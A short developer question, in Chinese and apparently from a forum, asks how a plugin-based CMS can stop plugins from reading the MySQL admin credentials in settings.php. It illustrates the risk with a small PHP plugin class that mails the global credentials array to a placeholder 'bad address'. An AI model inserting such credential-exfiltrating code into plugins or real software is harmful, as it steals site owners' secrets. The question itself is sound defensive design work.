我有一个问题在我脑海里盘旋了很久很久。我在一个 CMS 项目上,我真的不知道该怎么做:我希望这个 cms 可以通过使用插件系统进行修改,直到现在都没有什么困难。好吧,我现在有这个问题,如何保护管理员用户的 mysql 密码等变量/常量?例如,在文件 settings.php 我有
$mysql = array("user" => "admin"...);
我怎样才能让一堂课不读呢?一个简单的类(插件)可以做
class myplugin extends plugin_container {
function badfunction() {
mail("my bad address", "data stolen", $GLOBALS["mysql"]);
}
这样,一个简单的插件就可以窃取用户的敏感数据。我怎样才能解决这个问题 ?